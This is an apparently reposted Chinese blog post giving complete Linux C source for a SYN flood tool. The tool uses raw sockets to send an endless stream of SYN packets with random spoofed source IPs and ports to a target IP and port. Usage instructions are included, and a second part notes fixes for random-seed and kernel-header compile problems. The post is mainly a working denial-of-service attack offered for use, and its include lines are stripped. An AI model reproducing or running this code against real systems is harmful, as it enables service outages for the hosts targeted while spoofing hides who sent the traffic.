一、linux下源代码实现/* syn flood by wqfhenanxc. * random soruce ip and random sourec port. * use #include <tcp_new.h>instead of for my own system reason. * usage :eg. to flood port 8080 on ip 246.245.167.45 ./synflood 246.245.167.45 8080 * any question mail to wqfhenanxc@gmail.com * 2009.6.12 */#include #include #include #include #include #include #include #include #include #include //#include "synflood.h"//#define DEFAULT_DPORT 80//#define SPORT 8888#define getrandom(min, max) ((rand() % (int)(((max)+1) - (min))) + (min))void send_tcp(int sockfd,struct sockaddr_in *addr);unsigned short checksum(unsigned short *buffer, int size);unsigned short random_port(unsigned short minport,unsigned short maxport);void random_ip(char *str);int main(int argc,char **argv){ int sockfd; struct sockaddr_in addr; //int dport; int on=1; if(argc!=3){ printf("usage: <command_name><target_ip>\n"); exit(1); } bzero(&addr,sizeof(struct sockaddr_in)); addr.sin_family=AF_INET; addr.sin_port=htons(atoi(argv[2])); //addr.sin_addr.s_addr=inet_aton(argv[1]); inet_pton(AF_INET,argv[1],&addr.sin_addr); /*if(inet_aton(argv[1],&addr.sin_addr)==0){ host=gethostbyname }*/ sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP); if(sockfd<0){ printf("Socket error!\n"); exit(1); } setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on)); while(1){ send_tcp(sockfd,&addr); } return 0;}void send_tcp(int sockfd,struct sockaddr_in *addr){ char buff[100]; struct iphdr ip_header; struct tcphdr tcp_header; unsigned short source_port=random_port(1024,5000); char ip_str[50]; struct in_addr ip; random_ip(ip_str); if(inet_aton(ip_str,&ip)==0){ printf("inet_aton error!\n"); exit(1); } bzero(buff,100); //ip_header=(struct iphdr*)buff; ip_header.version=4; ip_header.ihl=5; ip_header.tos=0; ip_header.tot_len=sizeof(struct iphdr)+sizeof(struct tcphdr); ip_header.id=htons(random()); ip_header.frag_off=0; ip_header.ttl=30; ip_header.protocol=IPPROTO_TCP; ip_header.check=0; ip_header.saddr=ip.s_addr; ip_header.daddr=addr->sin_addr.s_addr; //tcp_header=(struct tcphdr*)(buff+sizeof(struct iphdr)); tcp_header.source=htons(source_port); tcp_header.dest=addr->sin_port; tcp_header.seq=rand(); tcp_header.doff=sizeof(struct tcphdr)/4; tcp_header.ack_seq=0; tcp_header.res1=0; tcp_header.fin=0; tcp_header.syn=1; tcp_header.rst=0; tcp_header.psh=0; tcp_header.ack=0; tcp_header.urg=0; tcp_header.window=htons(65535); tcp_header.check=0; tcp_header.urg_ptr=0; //send_tcp_segment(&ip_header,&tcp_header,"",0); struct{ unsigned long saddr; unsigned long daddr; char mbz; char ptcl; unsigned short tcpl; }psd_header; psd_header.saddr=ip_header.saddr; psd_header.daddr=ip_header.daddr; psd_header.mbz=0; psd_header.ptcl=IPPROTO_TCP; psd_header.tcpl=htons(sizeof(struct tcphdr)); memcpy(buff,&psd_header,sizeof(psd_header)); memcpy(buff+sizeof(psd_header),&tcp_header,sizeof(tcp_header)); //memcpy(buf+sizeof(psd_header)+sizeof(tcp_header),data,dlen); //memset(buf+sizeof(psd_header)+sizeof(tcp_header)+dlen,0,4); tcp_header.check=checksum((unsigned short*)buff,sizeof(psd_header)+sizeof(tcp_header)); memcpy(buff,&ip_header,4*ip_header.ihl); memcpy(buff+4*ip_header.ihl,&tcp_header,sizeof(tcp_header)); //memcpy(buf+4*ip_header.ihl+sizeof(tcp_header),data,dlen); //memset(buf+4*ip_header.ihl+sizeof(tcp_header)+dlen,0,4); ip_header.check=checksum((unsigned short*)buff,4*ip_header.ihl+sizeof(tcp_header)); // send_seq=SEQ+1+strlen(buf); sendto(sockfd,buff,sizeof(struct iphdr)+sizeof(struct tcphdr),0, (struct sockaddr*)addr,sizeof(struct sockaddr_in)); }unsigned short checksum(unsigned short *buffer, int size){ unsigned long cksum=0; while(size >1) { cksum+=*buffer++; size -=sizeof(unsigned short); } if(size ) cksum += *(unsigned char*)buffer; //..buffer..size..2...... cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (unsigned short)(~cksum);}unsigned short random_port(unsigned short minport,unsigned short maxport){ /*struct time stime; unsigned seed; gettime(&stime); seed=stime.ti_hund*stime.ti_min*stime.ti_hour; srand(seed);*/ srand((unsigned)time(NULL)); return(getrandom(minport,maxport));}void random_ip(char *str){ int a,b,c,d,i=0; static long j=0; srand((unsigned)time(NULL)+(i++)+(j++)); a=getrandom(0,255); srand((unsigned)time(NULL)+(i++)+(j++)); b=getrandom(0,255); srand((unsigned)time(NULL)+(i++)+(j++)); c=getrandom(0,255); srand((unsigned)time(NULL)+(i++)+(j++)); d=getrandom(0,255); sprintf(str,"%d.%d.%d.%d",a,b,c,d); printf("%s\n",str); }二、编写中遇到的问题1.rand()函数问题。随机ip地址四个字段分别生成,结果由于生成速度太快,作为srand()种子的系统时间没有来得及变化,导致ip四个字段相同,如118.118.118.118,并且接连有10个左右的包是同一个ip。解决办法是引入自增量i和j。2.编译错误如下:/usr/include/linux/ip.h:95: error: syntax error before "__u8"/usr/include/linux/ip.h:102: error: syntax error before "tot_len"/usr/include/linux/ip.h:103: error: syntax error before "id"/usr/include/linux/ip.h:104: error: syntax error before "frag_off"/usr/include/linux/ip.h:105: error: syntax error before "ttl"/usr/include/linux/ip.h:106: error: syntax error before "protocol"/usr/include/linux/ip.h:107: error: syntax error before "check"/usr/include/linux/ip.h:108: error: syntax error before "saddr"/usr/include/linux/ip.h:109: error: syntax error before "daddr"。。。。。。。。。/usr/include/linux/tcp.h:105: enumerator value for `TCP_FLAG_CWR' notinteger constant/usr/include/linux/tcp.h:106: syntax error before "__u32"/usr/include/linux/tcp.h:107: syntax error before "__u32"/usr/include/linux/tcp.h:108: syntax error before "__u32"/usr/include/linux/tcp.h:109: syntax error before "__u32"/usr/include/linux/tcp.h:110: syntax error before "__u32"/usr/include/linux/tcp.h:111: syntax error before "__u32"/usr/include/linux/tcp.h:112: syntax error before "__u32"/usr/include/linux/tcp.h:113: syntax error before "__u32"/usr/include/linux/tcp.h:114: syntax error before "__u32"以上两个错误是由于系统的ip.h和tcp.h确实有问题,第一个错误通过 增加 #include 来解决,该文件包含了__u8和__u32的定义。第二个错误源自tcp.h的如下几行:enum {TCP_FLAG_CWR = htonl(0x00800000)TCP_FLAG_ECE = htonl(0x00400000),TCP_FLAG_URG = htonl(0x00200000),TCP_FLAG_ACK = htonl(0x00100000),TCP_FLAG_PSH = htonl(0x00080000),TCP_FLAG_RST = htonl(0x00040000),TCP_FLAG_SYN = htonl(0x00020000),TCP_FLAG_FIN = htonl(0x00010000),TCP_RESERVED_BITS = htonl(0x0FC000000),TCP_DATA_OFFSET = htonl(0xF0000000)};解决办法:将tcp.h的内容拷贝到另一个新建的文件tcp_new.h中,在新文件中去掉上面几行代码中的htonl,在自己的文件中用#include 代替#include 即可。参考资料:1.http://www.linuxsir.org/bbs/showthread.php?t=1019902.Zakath的syn-flood源码3.http://fanqiang.chinaunix.net/a4/b7/20010508/112433.html
转载于:https://www.cnblogs.com/fchy822/p/4805609.html
相关资源:SYN Flooder 攻击源码